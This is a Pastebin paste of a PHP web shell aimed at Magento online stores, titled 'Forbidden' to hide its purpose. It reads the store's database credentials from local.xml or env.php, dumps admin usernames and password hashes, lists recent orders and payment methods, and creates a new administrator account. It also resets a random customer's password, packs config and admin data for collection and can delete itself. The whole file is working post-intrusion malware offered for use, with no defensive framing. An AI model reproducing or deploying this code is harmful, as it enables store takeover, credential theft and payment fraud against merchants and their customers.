API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 20th, 2019
159
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.34 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. $conn = false;
  3. $connd = array('h'=>'', 'u'=>'', 'p'=>'', 'd'=>'', 'r'=>'');
  4. $isM2 = false;
  5.  
  6. $path = get_magento_path();
  7.  
  8.  
  9. $isMysqli = function_exists('mysqli_connect');
  10. $connResult = '';
  11. if(isset($_POST['btn_c'])) {
  12. $connd['h'] = @$_POST['h'];
  13. $connd['u'] = @$_POST['u'];
  14. $connd['p'] = @$_POST['p'];
  15. $connd['d'] = @$_POST['d'];
  16. $connd['r'] = @$_POST['r'];
  17. $conn = sql_conn($connd);
  18. if($conn!==false) {
  19. setcookie('h_c' , $connd['h'].'|'.$connd['u'].'|'.$connd['p'].'|'.$connd['d'].'|'.$connd['r']);
  20. $connResult = 'Connect ok!<br>';
  21. } else {
  22. $connResult = 'Test connection error! ERR:'.sql_conn_error().'<br>';
  23. }
  24. } elseif(isset($_COOKIE['h_c'])) {
  25. list($connd['h'], $connd['u'], $connd['p'], $connd['d'], $connd['r']) = explode('|', $_COOKIE['h_c']);
  26. $conn = sql_conn($connd);
  27. } else {
  28. $c = load_xml();
  29. if($c!==false) {
  30. $connd = $c;
  31. $conn = sql_conn($connd);
  32. }
  33. }
  34.  
  35. ?>
  36. <html>
  37. <head>
  38. <title>Forbidden</title>
  39. </head>
  40. <body>
  41. <?php if($conn) { ?>
  42. <p style="display:inline; color:green;">Connected</p> to <?php echo $connd['u'].':'.$connd['p'].'@'.$connd['h'].'/'.$connd['d'].($connd['r']!='' ? ' ('.$connd['r'].')':'').' via '.($isMysqli ? 'MySQLi':'MySQL').' ('.($isM2 ? 'M2' : 'M1').')'; ?>
  43. <?php } else { ?>
  44. <p style="display:inline; color:red;">Not connected</p>
  45. <?php } ?>
  46. <hr>
  47. [<a href="?a=c">Connection</a>] [<a href="?a=o">Orders</a>] [<a href="?a=a">Add admin</a>] [<a href="?a=l">Admin list</a>] [<a href="?a=u">Change user</a>] [<a href="?a=x">local.xml</a>] [<a href="?a=p">Dump</a>] [<a href="?a=d">Delete</a>]<br>
  48. <hr>
  49. <?php
  50.  
  51. if(!$conn)
  52. $act = 'c';
  53. else
  54. $act = @$_GET['a'];
  55.  
  56. switch($act) {
  57. case 'c':
  58. show_c();
  59. break;
  60. case 'a':
  61. show_a();
  62. break;
  63. case 'u':
  64. show_u();
  65. break;
  66. case 'o':
  67. show_o();
  68. break;
  69. case 'l':
  70. show_l();
  71. break;
  72. case 'x':
  73. show_x();
  74. break;
  75. case 'p':
  76. show_p();
  77. break;
  78. case 'd':
  79. $unlink = unlink(__FILE__);
  80. clearstatcache();
  81. $exists = file_exists(__FILE__);
  82. echo "Unlink: <b style='color: ".($unlink===true ? 'green' : 'red')."'>".var_export($unlink, true)."</b><br>\n";
  83. echo "File exists: <b style='color: ".($exists===false ? 'green' : 'red')."'>".var_export($exists, true)."</b>\n";
  84. break;
  85. }
  86.  
  87. ?>
  88.  
  89. </body>
  90. </html>
  91. <?php
  92. function show_o() {
  93. global $connd, $isM2;
  94. if(isset($_REQUEST['limit'])) {
  95. $limit = intval($_REQUEST['limit']);
  96. } else {
  97. $limit = 100;
  98. }
  99.  
  100. if($isM2) {
  101.  
  102. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_order` WHERE created_at > DATE_SUB(now(), INTERVAL 1 DAY) ");
  103. $t1 = sql_array($q);
  104. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_order` WHERE created_at > DATE_SUB(now(), INTERVAL 7 DAY) ");
  105. $t7 = sql_array($q);
  106. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_order` WHERE created_at > DATE_SUB(now(), INTERVAL 30 DAY) ");
  107. $t30 = sql_array($q);
  108. } else {
  109. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_flat_order` WHERE created_at > DATE_SUB(now(), INTERVAL 1 DAY) ");
  110. $t1 = sql_array($q);
  111. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_flat_order` WHERE created_at > DATE_SUB(now(), INTERVAL 7 DAY) ");
  112. $t7 = sql_array($q);
  113. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_flat_order` WHERE created_at > DATE_SUB(now(), INTERVAL 30 DAY) ");
  114. $t30 = sql_array($q);
  115. }
  116.  
  117. printf('<b>?003f?003f003f003c/b>: %d <b>?003f?003f003f</b>: %d <b>?003f?003f003f003c/b>: %d | <b>?003f?003f003f</b>: %d (?limit=%d)<br>', $t1['total'], $t7['total'], $t30['total'], $limit, $limit);
  118. if($isM2) {
  119. $q = sql_query("SELECT * FROM `{$connd['r']}sales_order` ORDER BY `created_at` DESC LIMIT ".$limit);
  120. } else {
  121. $q = sql_query("SELECT * FROM `{$connd['r']}sales_flat_order` ORDER BY `created_at` DESC LIMIT ".$limit);
  122. }
  123. echo '<table border=1><tr><th>ID</th><th>Date</th><th>Amount</th><th>Pay</th></tr>';
  124. while($o = sql_array($q)) {
  125. if($isM2) {
  126. $qq = sql_query("SELECT `method` FROM `{$connd['r']}sales_order_payment` WHERE `entity_id` = {$o['entity_id']} LIMIT 1");
  127.  
  128. } else {
  129. $qq = sql_query("SELECT `method` FROM `{$connd['r']}sales_flat_order_payment` WHERE `entity_id` = {$o['entity_id']} LIMIT 1");
  130. }
  131. $p = sql_array($qq);
  132.  
  133. $qqq = sql_query( "SELECT `value` FROM `{$connd['r']}core_config_data` WHERE `path` = 'payment/{$p['method']}/title' AND `value` != '' LIMIT 1");
  134. $pt = sql_array($qqq);
  135. echo "<tr><td>#{$o['increment_id']}</td><td>{$o['created_at']}</td><td>{$o['base_subtotal_incl_tax']}</td><td>{$p['method']}({$pt['value']})</td></tr>";
  136.  
  137. }
  138. echo '</table>';
  139. }
  140. function show_u() {
  141. global $connd,$isM2;
  142. if(isset($_POST['btn_uc'])) {
  143. $p = @$_POST['p'];
  144. $salt = 'ab';
  145.  
  146. $q = sql_query("SELECT `entity_id`,`email` FROM `{$connd['r']}customer_entity` ORDER BY RAND() LIMIT 1");
  147. $u = sql_array($q);
  148. if(!is_array($u) || $u['entity_id']=='') {
  149. echo 'Customer search error: '.sql_error().'<br>';
  150. } else {
  151. if($isM2) {
  152. sql_query("UPDATE `{$connd['r']}customer_entity` SET password_hash = '".md5($salt.$p).":{$salt}:0' WHERE entity_id = {$u['entity_id']}");
  153. }
  154. if(sql_query("INSERT INTO `{$connd['r']}customer_entity_varchar` (value_id, attribute_id, entity_id, value) VALUES(null, (select attribute_id from `{$connd['r']}eav_attribute` where attribute_code='password_hash' and entity_type_id=1 LIMIT 1), {$u['entity_id']}, '".md5($salt.$p).":{$salt}') ON DUPLICATE KEY UPDATE value='".md5($salt.$p).":{$salt}'")) {
  155. echo 'Update ok!<br>';
  156. echo 'ID: '.$u['entity_id'].'<br>';
  157. echo 'Email: '.$u['email'].'<br>';
  158. echo 'Pass: '.$p.'<br>';
  159. } else {
  160. echo 'Customer update error: '.sql_error().'<br>';
  161. }
  162. }
  163. }
  164. echo '<form method="POST">
  165. Pass: <input type="text" name="p"><br>
  166. <input type="submit" name="btn_uc" value="Change password">
  167. </form>';
  168. }
  169. function show_a() {
  170. global $connd,$isM2;
  171. if(isset($_POST['btn_aa'])) {
  172. $salt = 'ab';
  173. if($isM2) {
  174. $q1 = "INSERT INTO `{$connd['r']}admin_user` (`firstname`,`lastname`,`email`,`username`,`password`) VALUES ('".sql_escape(@$_POST['f'])."','".sql_escape(@$_POST['l'])."','".sql_escape(@$_POST['e'])."','".sql_escape(@$_POST['u'])."','".hash('sha256', $salt.@$_POST['p']).":{$salt}:1')";
  175. } else {
  176. $q1 = "INSERT INTO `{$connd['r']}admin_user` (`firstname`,`lastname`,`email`,`username`,`password`) VALUES ('".sql_escape(@$_POST['f'])."','".sql_escape(@$_POST['l'])."','".sql_escape(@$_POST['e'])."','".sql_escape(@$_POST['u'])."','".md5($salt.@$_POST['p']).":{$salt}')";
  177. }
  178. if(sql_query($q1)) {
  179. if($isM2) {
  180. $q2 = "INSERT INTO `{$connd['r']}authorization_role` (`role_id`,`parent_id`,`tree_level`,`sort_order`,`role_type`,`user_id`,`role_name`,`user_type`) VALUES (null, 1, 2, 0, 'U', ".sql_id().", '".sql_escape(@$_POST['u'])."', 2)";
  181. } else {
  182. $q2 = "INSERT INTO `{$connd['r']}admin_role` (`role_id`,`parent_id`,`tree_level`,`sort_order`,`role_type`,`user_id`,`role_name`) VALUES (null, 1, 2, 0, 'U', ".sql_id().", '".sql_escape(@$_POST['u'])."')";
  183. }
  184. if(sql_query($q2))
  185. echo "Added admin!<br>";
  186. else
  187. echo "Error when adding admin role: ".sql_error()."<br>";
  188.  
  189.  
  190. } else
  191. echo "Error when adding admin: ".sql_error()."<br>";
  192. }
  193.  
  194. echo '<form method="POST">
  195. First:<input type="text" name="f"><br>
  196. Last:<input type="text" name="l"><br>
  197. Email:<input type="text" name="e"><br>
  198. Login:<input type="text" name="u"><br>
  199. Pass:<input type="text" name="p"><br>
  200. <input type="submit" name="btn_aa" value="Add">
  201. </form>';
  202. }
  203. function show_c() {
  204. global $connd, $connResult;
  205. if(isset($_POST['btn_l'])) {
  206. $c = load_xml();
  207. if($c===false)
  208. echo 'Cannot find xml!<br>';
  209. else
  210. $connd = $c;
  211. }
  212. if($connResult!='') {
  213. echo $connResult;
  214. }
  215. echo '<form method="POST">
  216. Host: <input type="text" name="h" value="'.$connd['h'].'"><br>
  217. User: <input type="text" name="u" value="'.$connd['u'].'"><br>
  218. Pass: <input type="text" name="p" value="'.$connd['p'].'"><br>
  219. DB: <input type="text" name="d" value="'.$connd['d'].'"><br>
  220. Prefix: <input type="text" name="r" value="'.$connd['r'].'"><br>
  221. <input type="submit" name="btn_c" value="Save"><input type="submit" name="btn_l" value="Load xml">
  222. </form>';
  223. }
  224. function show_l() {
  225. global $connd;
  226.  
  227. $q = sql_query("SELECT * FROM `{$connd['r']}admin_user` ORDER BY `user_id` ASC");
  228.  
  229. echo '<table border=1><tr><th>ID</th><th>Name</th><th>Login</th><th>Email</th><th>Password</th><th>Log date</th></tr>';
  230. $outStr = '';
  231. $dumpStr = 'user_id/firstname/lastname/username/email/password/logdate/is_active'."\n";
  232. while($item = sql_array($q)) {
  233. $outStr .= $item['username'].':'.$item['password']."\r\n";
  234. $dumpStr .= $item['user_id'].'/'.$item['firstname'].'/'.$item['lastname'].'/'.$item['username'].'/'.$item['email'].'/'.$item['password'].'/'.$item['logdate'].'/'.$item['is_active']."\n";
  235. echo '<tr><td>'.$item['user_id'].'</td><td>'.$item['firstname'].' '.$item['lastname'].'</td><td>'.$item['username'].'</td><td>'.$item['email'].'</td><td>'.$item['password'].'</td><td>'.$item['logdate'].' ('.$item['is_active'].')</td></tr>';
  236. }
  237. echo '</table>';
  238. echo '<textarea cols=100 rows=20>'.htmlspecialchars($outStr).'</textarea><br>';
  239. echo '<textarea cols=100 rows=20>'.htmlspecialchars($dumpStr).'</textarea>';
  240. }
  241. function show_x() {
  242. global $isM2;
  243. $xml = get_xml();
  244. if($isM2) {
  245. echo "Path: <b>".get_magento_path()."/app/etc/env.php</b><br>";
  246. echo '<textarea cols=100 rows=20>'.htmlspecialchars(file_get_contents(get_magento_path()."/app/etc/env.php")).'</textarea>';
  247. } else {
  248. echo "Path: <b>".get_magento_path()."/app/etc/local.xml</b><br>";
  249. echo '<textarea cols=100 rows=20>'.htmlspecialchars($xml).'</textarea>';
  250. }
  251. }
  252.  
  253. function show_p() {
  254. global $connd;
  255. global $isM2;
  256.  
  257. if($isM2)
  258. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_order` WHERE created_at > DATE_SUB(now(), INTERVAL 30 DAY) ");
  259. else
  260. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_flat_order` WHERE created_at > DATE_SUB(now(), INTERVAL 30 DAY) ");
  261.  
  262. $t30 = sql_array($q);
  263.  
  264. $xml = '';
  265. if($isM2) {
  266. $xml .= "<h_engine_name>[PHP] Magento 2.x</h_engine_name>\n";
  267. } else {
  268. $xml .= "<h_engine_name>[PHP] Magento 1.x</h_engine_name>\n";
  269. }
  270.  
  271. $xml .= "<h_engine_path>".get_magento_path()."</h_engine_path>\n";
  272. $xml .= "<h_ordes_count_m>".$t30['total']."</h_ordes_count_m>\n";
  273. $xml .= "<h_admins_list>".getAdminsRaw()."</h_admins_list>\n";
  274.  
  275. if($isM2) {
  276. $xml .= "<h_config_local_xml>".file_get_contents(get_magento_path()."/app/etc/env.php")."</h_config_local_xml>";
  277. } else {
  278. $xml .= "<h_config_local_xml>".get_xml()."</h_config_local_xml>";
  279. }
  280.  
  281. echo '<textarea cols=100 rows=20>'.htmlspecialchars($xml).'</textarea>';
  282. }
  283.  
  284.  
  285.  
  286.  
  287. function load_xml() {
  288. global $isM2;
  289. $xml = get_xml();
  290.  
  291. if($xml!==false) {
  292. if($isM2) {
  293. return array('h'=>$xml['db']['connection']['default']['host'], 'u'=>$xml['db']['connection']['default']['username'], 'p'=>$xml['db']['connection']['default']['password'],'d'=>$xml['db']['connection']['default']['dbname'],'r'=>$xml['db']['connection']['table_prefix']);
  294. } else {
  295. $xml = preg_replace('/<!--(.*?)-->/is', '', $xml);
  296. preg_match('/<host><!\[CDATA\[(.*?)\]\]><\/host>/i', $xml, $m1);
  297. preg_match('/<username><!\[CDATA\[(.*?)\]\]><\/username>/i', $xml, $m2);
  298. preg_match('/<password><!\[CDATA\[(.*?)\]\]><\/password>/i', $xml, $m3);
  299. preg_match('/<dbname><!\[CDATA\[(.*?)\]\]><\/dbname>/i', $xml, $m4);
  300. preg_match('/<table_prefix><!\[CDATA\[(.*?)\]\]><\/table_prefix>/i', $xml, $m5);
  301.  
  302. return array('h'=>$m1[1], 'u'=>$m2[1], 'p'=>$m3[1],'d'=>$m4[1],'r'=>$m5[1]);
  303. }
  304.  
  305. }
  306.  
  307. return false;
  308. }
  309.  
  310. function getAdminsRaw() {
  311. global $connd;
  312. $q = sql_query("SELECT * FROM `{$connd['r']}admin_user` ORDER BY `user_id` ASC");
  313.  
  314. $dumpStr = 'user_id/firstname/lastname/username/email/password/logdate/is_active'."\n";
  315. while($item = sql_array($q)) {
  316. $dumpStr .= $item['user_id'].'/'.$item['firstname'].'/'.$item['lastname'].'/'.$item['username'].'/'.$item['email'].'/'.$item['password'].'/'.$item['logdate'].'/'.$item['is_active']."\n";
  317. }
  318.  
  319. return $dumpStr;
  320. }
  321.  
  322. function get_xml() {
  323. global $isM2;
  324. if($isM2) {
  325. return include(get_magento_path().'/app/etc/env.php');
  326. } else {
  327. return file_get_contents(get_magento_path().'/app/etc/local.xml');
  328. }
  329.  
  330. }
  331.  
  332. function get_magento_path() {
  333. global $isM2;
  334. for($i=0;$i<=10;$i++) {
  335. if(file_exists(str_repeat('../', $i).'app/etc/local.xml')) {
  336. $isM2 = false;
  337. return realpath(str_repeat('../', $i));
  338. }
  339. if(file_exists(str_repeat('../', $i).'app/etc/env.php')) {
  340. $isM2 = true;
  341. return realpath(str_repeat('../', $i));
  342. }
  343.  
  344. }
  345.  
  346. return false;
  347. }
  348.  
  349. function sql_conn($data) {
  350. global $isMysqli;
  351. if($isMysqli) {
  352. $c = mysqli_connect($data['h'], $data['u'], $data['p'], $data['d']);
  353. if($c===false)
  354. return false;
  355. if(!mysqli_set_charset($c, 'utf8'))
  356. return false;
  357.  
  358. } else {
  359. $c = mysql_connect($data['h'], $data['u'], $data['p']);
  360. if(!$c)
  361. return false;
  362. if(!mysql_select_db($data['d']))
  363. return false;
  364. if(!mysql_set_charset('utf8'))
  365. return false;
  366.  
  367. }
  368.  
  369. return $c;
  370. }
  371.  
  372. function sql_query($q) {
  373. global $conn, $isMysqli;
  374. if($isMysqli) {
  375. return mysqli_query($conn, $q);
  376. } else {
  377. return mysql_query($q, $conn);
  378. }
  379. }
  380.  
  381. function sql_array($q) {
  382. global $conn, $isMysqli;
  383. return $isMysqli ? mysqli_fetch_array($q) : mysql_fetch_array($q);
  384. }
  385.  
  386. function sql_error() {
  387. global $isMysqli, $conn;
  388. return $isMysqli ? mysqli_error($conn) : mysql_error();
  389. }
  390.  
  391. function sql_escape($str) {
  392. global $isMysqli, $conn;
  393. return $isMysqli ? mysqli_real_escape_string($conn, $str) : mysql_real_escape_string($str);
  394. }
  395.  
  396. function sql_id() {
  397. global $isMysqli, $conn;
  398. return $isMysqli ? mysqli_insert_id($conn) : mysql_insert_id();
  399. }
  400.  
  401. function sql_conn_error() {
  402. global $isMysqli;
  403. return $isMysqli ? mysqli_connect_error() : mysql_error();
  404. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!